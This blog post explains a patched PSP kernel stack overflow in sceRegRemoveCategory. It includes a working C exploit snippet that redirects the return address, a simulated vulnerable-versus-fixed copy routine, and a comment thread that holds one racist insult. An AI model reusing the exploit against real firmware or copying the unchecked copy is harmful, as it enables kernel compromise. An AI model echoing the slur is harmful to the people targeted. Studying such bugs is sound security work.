Anatomy of a cool (undisclosed) kernel exploit
How many times have you heard “Kernel exploits are hard to find, devs can’t just release them!”?
Well, that’s not really true. To prove it, here I’m posting a pretty cool bug found a couple of years ago.
Of course, this exploit is patched by now; it wouldn’t make sense to waste a perfectly working exploit right now (even though there are many…), but I thought it’d be cool to show you guys this 🙂
But first, a bit of history.
In 2011, while investigating registry.prx, I noticed Sony made a pretty dumb error (yes, another one…) and started working with someone to exploit it.
It only took a few days to get a PoC running; it’s probably one of the easiest exploits ever: a simple, dumb stack buffer overflow.
A year ago, I handed it over to jigsaw who used it to investigate Syscall Internals (he did a pretty cool job btw ;))
But now, the exploit.
We exploited a vulnerability in sceRegRemoveCategory, the syscall that removes a category from the system registry (obviously). It takes two arguments: a REGHANDLE and a string.
The REGHANDLE is a value given to us by sceRegOpenRegistry when we open a valid registry, totally legit, but let’s take a look at that string…
The string is just the name of the category you want to get rid of. In the PSP’s system registry, all names start with a ‘/’, and that is the only thing sceRegRemoveCategory checks: the first character of the string.
Well, it also checks that the provided string is not in kernel space, but we don’t care about that in this case.
RemoveCategory allocates 0x1B (27) bytes on its stack for the name, then calls a subroutine that copies our string into that space… without checking the length of our string!
See the problem here? We can easily overflow that buffer by providing a string that looks like ‘/<27+ random chars>’.
The return address is stored 0x54 (84) bytes later on the stack, so we can just overwrite it and wait for sceRegRemoveCategory to return; even if it returns with an error, we don’t care 😉 Two details matter when you build the string: the address is written in little-endian byte order (the PSP’s MIPS core is little-endian), and since the copy stops at the string terminator, the address must not contain a zero byte.
tl;dr, here’s a code snippet; callback_addr is the address of the function you want to execute with kernel permissions.
#include <string.h>
#include <pspreg.h>   /* struct RegParam, REGHANDLE, sceRegOpenRegistry, sceRegRemoveCategory (PSPSDK) */

/* callback_addr: address of the function to run with kernel permissions */
void run_rmc_exploit(unsigned int callback_addr)
{
    char rmc_stack[0x5A];
    struct RegParam exp_params;
    REGHANDLE exp_handle;

    memset(&exp_params, 0, sizeof(exp_params));
    exp_params.regtype = 1;
    exp_params.unk2 = 1;
    exp_params.unk3 = 1;
    exp_params.namelen = strlen("/system");
    strcpy(exp_params.name, "/system");

    if (!sceRegOpenRegistry(&exp_params, 2, &exp_handle)) /* need a valid registry handle to continue */
    {
        memset(rmc_stack, 'X', 0x5A);  /* filler: everything past the 0x1B-byte buffer gets overwritten */
        rmc_stack[0] = '/';            /* this is enough to fool registry: the first char is all it checks */
        rmc_stack[0x5A - 1] = 0;       /* terminator, so the copy stops here */
        /* the callback address, little-endian, ends up on top of the saved return address */
        rmc_stack[0x5A - 2] = (callback_addr >> 24) & 0xFF;
        rmc_stack[0x5A - 3] = (callback_addr >> 16) & 0xFF;
        rmc_stack[0x5A - 4] = (callback_addr >> 8) & 0xFF;
        rmc_stack[0x5A - 5] = callback_addr & 0xFF;
        sceRegRemoveCategory(exp_handle, rmc_stack); /* returns into callback_addr, error or not ;) */
    }
}
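To make the mechanics concrete without a PSP, here is an added, host-side example (mine, not the post’s code and not Sony’s) that models the bug beside its fix. The frame layout is an assumption: a 0x1B-byte name buffer with the saved return address 0x54 bytes past its start, the two offsets the post gives; the real registry.prx frame and the kernel-address check are not reproduced. build_payload builds a string with the same shape as the snippet above (leading ‘/’, filler, little-endian address, NUL last) and also refuses addresses containing a zero byte, since a string copy would stop there.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed, simplified frame of the vulnerable callee (offsets from the post). */
#define CAT_BUF_LEN 0x1B
#define RA_OFFSET   0x54
#define PAYLOAD_LEN 0x5A   /* same string size as the post's snippet */

struct frame {
    unsigned char category[CAT_BUF_LEN];
    unsigned char locals[RA_OFFSET - CAT_BUF_LEN];
    unsigned char saved_ra[4];     /* little-endian, like the PSP's MIPS core */
    unsigned char caller[16];      /* caller's frame: absorbs the overflow tail */
};

/* Read/write the saved return address as a little-endian word, whatever the host. */
uint32_t frame_ra(const struct frame *f)
{
    return (uint32_t)f->saved_ra[0] | ((uint32_t)f->saved_ra[1] << 8) |
           ((uint32_t)f->saved_ra[2] << 16) | ((uint32_t)f->saved_ra[3] << 24);
}
void set_ra(struct frame *f, uint32_t v)
{
    int k;
    for (k = 0; k < 4; k++)
        f->saved_ra[k] = (unsigned char)((v >> (8 * k)) & 0xFF);
}

/* The bug: validate only name[0], then copy to the terminator with no length
 * check, straight through the locals and the saved return address. The
 * sizeof guard only keeps this demo inside its own object; the real copy has none. */
int vuln_remove_category(struct frame *f, const char *name)
{
    unsigned char *dst = (unsigned char *)f;   /* category[] sits at offset 0 */
    size_t i;
    if (name[0] != '/')
        return -1;
    for (i = 0; name[i] != '\0' && i + 1 < sizeof *f; i++)
        dst[i] = (unsigned char)name[i];
    dst[i] = 0;
    return 0;
}

/* The fix: the name must start with '/' and fit, terminator included,
 * before a single byte is copied. */
int safe_remove_category(struct frame *f, const char *name)
{
    size_t n = 0;
    while (n < CAT_BUF_LEN && name[n] != '\0')
        n++;
    if (name[0] != '/' || n == CAT_BUF_LEN)   /* no terminator within 0x1B bytes */
        return -1;
    memcpy(f->category, name, n + 1);
    return 0;
}

/* Payload with the snippet's shape. -1: buffer too small; -2: the address has a
 * zero byte, so a string copy would stop before the overwrite completes. */
int build_payload(uint32_t target, char *out, size_t outlen)
{
    int k;
    if (outlen < PAYLOAD_LEN)
        return -1;
    for (k = 0; k < 4; k++)
        if (((target >> (8 * k)) & 0xFF) == 0)
            return -2;
    memset(out, 'X', PAYLOAD_LEN);
    out[0] = '/';
    for (k = 0; k < 4; k++)
        out[RA_OFFSET + k] = (char)((target >> (8 * k)) & 0xFF);
    out[PAYLOAD_LEN - 1] = '\0';
    return 0;
}

/* 1 when the vulnerable copy redirects the return address (constructed stand-in
 * 0x08900420) and the fixed copy rejects the same name untouched, else 0. */
int demo(uint32_t target)
{
    struct frame f;
    char payload[PAYLOAD_LEN];
    int hijacked, blocked;
    if (build_payload(target, payload, sizeof payload) != 0)
        return 0;
    memset(&f, 0, sizeof f);
    set_ra(&f, 0x08900420u);
    hijacked = vuln_remove_category(&f, payload) == 0 && frame_ra(&f) == target;
    memset(&f, 0, sizeof f);
    set_ra(&f, 0x08900420u);
    blocked = safe_remove_category(&f, payload) == -1 && frame_ra(&f) == 0x08900420u;
    return hijacked && blocked;
}

int main(void)
{
    printf("vulnerable copy hijacked RA, fixed copy blocked it: %s\n",
           demo(0x08A1B2C3u) ? "yes" : "no");
    return 0;
}
```

Note that the fix checks the length against the buffer before copying rather than truncating: a silently truncated category name would still be a bug, just not an exploitable one.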
As I said, this is patched by now (I think it was patched in the latest PSV update, not sure), but that doesn’t mean you can’t implement it, maybe on some older firmware, as an exercise.
I’m honestly surprised it took this long for Sony to patch this, especially when they made the same error in loadexec, back in 2.50 (iirc).
This shows how easy it is to break pspemu security, maybe it’s time to put our resources into something more interesting…
– Freddy
not interested
Interesting read, Freddy. Not checking string lengths really should be a fireable offense. ^^
Don’t say that. The glorious people who allow exploits like this should be praised for making it easy for the devs.
The point about kernel exploits is that they are limited.
“This shows how easy it is to break pspemu security, maybe it’s time to put our resources into something more interesting…”
Agreed lol, though that’s why it’s so funny xD
Indeed, I just checked and saw it, though it was removed in FW 1.80; it is only available up to 1.67.
In 1.80, though, it doesn’t seem Sony patched it; rather, they dummied sceRegRemoveCategory with dummy return values, lol, so maybe they didn’t even notice this.
1.69X also still has it, though, naturally.
Nice, but I dunno what it really does :p
Oh freddy, you don’t give yourself enough credit!
True, nice work freddy
It is still pretty interesting though. Sony didn’t remove the system call, but rather just gave it pre-determined (dummy) return values. If one were able to overwrite this system call with the old one, would the portions of old exploits relating to this system call work yet again???
I like the way you think, if it could be done MHFU FTW
Maybe Sony might have made the same mistake in PS Vita security… My saying is that the key is in the firmware stored in the Vita, like the PSP was hiding it, but someone discovered the key and very soon the PSP was hacked, and so if the PS Vita has the same security and a genius guy finds it, the Vita might be very hacked soon… ALL IT TAKES IS A LITTLE PUSH
same security? Sorry, but no, they do not have the same security.
Still wandering on the Vita live screen; Sony made an update in 2.12, I think, with all the patches Sony did since the Vita’s release. PSP XMB with Xbox boot sounds cool.. I guess I would need to get more into the Vita side to play with the PSP boot screen, but I didn’t try with ARK yet.. ARK is still pretty cool..
var is pavit hacked = prompt (“IS PSVITA HACKED”)
if
(“psvita is hacked”){
console.log (“very good”)
}else{
console.log (“very bad”)
{
I have no idea what language you use, but there is definitely at least one syntax error in it.
Time to bring out the vita exploits…
Security may not be wholly the same, because Sony is said to be learning from its mistakes… But minor security may be the same… We do not know right now what is the same and what’s not; let’s see in the future, when the PS Vita is completely hacked, then we will see what’s the same and what’s not……
all we know is that you need to go back to school, or that you are black.
I’ve been contemplating whether to update my TN-V Vita or not and this article really got me thinking about updating, lol. Been tired of not updating my trophies, lol.
Pretty racist, but ok…
@xoombie503
Adx2 is just talking about Sony’s encryption security and about the possibilities of hacking the Vita, etc.. So what do you mean go back to school, and that racist remark? So what if his spelling and grammar aren’t all that great? This place is not a writing center where everyone’s punctuation has to be right-on all the time. And sometimes people like to use shorter words.. doesn’t mean they need to go back to school.
So xoombie503 stop being a trolling racist jerk and gtfo man…
@Adx2
Don’t take xoombie seriously.. He could just be trolling to try and spark a fire, or just a seriously messed-up person in real life who sadly enjoys cursing, hating, bullying, and taking it out on people while hiding behind his computer screen because it’s easier.
Take care man.
Anyway nice article, freddy_156.
the things that are coming out of his hands?
This is a great article, but I’m bored with PSP emulation. This is history repeating itself. User mode is great, but it is very hard to get a lot of stuff working on it, and I’m stuck at 2.10 FW. And like you said, Freddy, “maybe it’s time to put our resources into something more interesting…”, and with all the new open-source OSes and ARM development boards, I think you may be right..
There is far more development happening on the 3DS side of things versus the Vita. We need more people to invest time into breaking the security of the Vita and actually being able to use the full specs of the Vita, not just enough to see it emulate PSP stuff 🙁
If you mean the bootloader, yes.
Though the bootloader is only that, no homebrews/emulators/freedom.
Wonderful, I have a 1.67 right now! Sadly I still can’t seem to get Open CMA 4.5 to muster on the current Vita I have.. Uno still waiting on the PS3 as well… sigh
Looks like you can tweak with your PS3, I guess, I was thinking, but you need a PS3 with CFW. 1.67 is sweet though; I think the Vita I am on came with 1.80, which is shitty compared to the first one I had, which came brand new and homebrew- and Other OS-ready, but I had to update it and not watch YouTube first. But anyway, downgrading the PSP was said to go to like 1.51, and 1.50 for Japan or something..
Isn’t the buffer overflow the same as the stack overflow on Windows PCs and whatnot?
No. A stack overflow is a specific case of buffer overflow, and none of this is specific to Windows vs PC vs PSP.
Nintendo made a similar mistake with Twilight Princess for the Wii where you could edit the save file and make the horse’s name longer than what was allowed and it caused a buffer overflow. Since retail Wii games can’t be updated Nintendo had to patch the bug in the Wii system software by having the system software explicitly check the save file and if the horse’s name was too long it would delete the save file. Although it took Nintendo a few tries to get it right.
It seems really silly to have a string value and not check to make sure the value is of the right length and if not, do some kind of error. Then again Sony probably outsourced their programmers and don’t pay them enough to check for serious bugs like this.
I would really like an actual PSV hack, not for backup games, but imagine the emulation possibilities; I could play Banjo-Tooie on it with no lag at all.
Go Go Gadget 2035 psv Ecfw!
Well, saying this string is unchecked and knowing how to use it are two different things; though this is in no way proof of the number of kexploits still in the PSP kernel.
I still have 2.12 downloaded and ready to install on the Vita on 2.06, last I checked. The shitty thing would be where you need a Vita at like 1.50 to downgrade a 2.06 Vita; last I checked, Sony was running the new 2.xx on the Vita at 1.80 and 2.02.
I was… the Facebook app needs an update…..
I hate myself for whenever I see code, I WANT TO BANG MY HEAD ON THE KEYBOARD and say to myself… WHY DIDN’T I KNOW THIS!! Why can’t I UNDERSTAND THIS THING!!
#include <iostream>
using namespace std;

int main(){
cout << "as of now, this is the only thing i can do and all other arithmetic calculations and some knowledge on variables" << endl;
return 0;
}
I WANT TO LEARN TO CODE.
Don’t feel bad; all I know is su fix_permission in the terminal on my Android, which makes me look cool when I eat at a diner with a cute waitress around lol
tbh… C and C++ are really horrible and not noob-friendly.. I tried coding in that in middle school for NDS homebrew and it didn’t come out too well.
So I tried Objective-C and learned it relatively much quicker. I think the syntax of Objective-C makes more sense and is far more intuitive than that of the older C itself..
@NeonAera thanks for supporting me …
and
@xoombie503 are you a grammar teacher, you *** .. NAH, JUST JOKING 🙂
@nevercall
I think you should visit code.org; you can learn to code there..
I’m learning JavaScript programming on code.org; you can learn anything related to coding there, it’s really helpful.